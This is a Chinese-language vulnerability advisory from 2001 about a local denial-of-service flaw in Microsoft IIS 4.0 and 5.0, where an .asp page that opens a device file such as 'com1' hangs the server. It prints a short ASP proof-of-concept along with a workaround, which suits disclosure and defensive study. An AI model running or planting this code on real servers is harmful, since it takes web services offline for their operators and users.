Microsoft IIS设备文件本地拒绝服务漏洞
发布日期:2001-07-04
更新日期:2001-07-12
受影响系统:
Microsoft IIS 5.0
- Microsoft Windows 2000
Microsoft IIS 4.0
- Microsoft Windows NT 4.0
描述:
BUGTRAQ ID: 2973
CVE(CAN) ID:
CAN-2001-1243
Microsoft IIS可能会由本地用户引发拒绝服务攻击,前提是本地用户可以创建一个
.asp文件,而这个.asp文件调用了设备文件。
这会导致Microsoft IIS停止响应,只有重新启动才能恢复正常工作。
如果站点自己的asp程序允许用户指定打开的文件,也可能导致拒绝服务发生。
<*来源:VIPER_SV /nerf/team/ (
hax@r.dot)
参考:
http://www.nerf.ru
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
VIPER_SV /nerf/team/ (
hax@r.dot)提供了如下测试代码:
<%
Dim strFileName, objFSO, objFile
Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
strFileName = "com1"
Set objFile = objFSO.OpenTextFile(strFileName)
Response.Write objFile.ReadAll
objFile.Close
%>
建议:
临时解决方法:
VIPER_SV /nerf/team/ (
hax@r.dot)提供了如下临时解决方法:
修复Scripting.FileSystemObject,在打开文件之前先检查是否存在
厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本:
http://www.microsoft.com/
浏览次数:4036
严重程度:0(网友投票)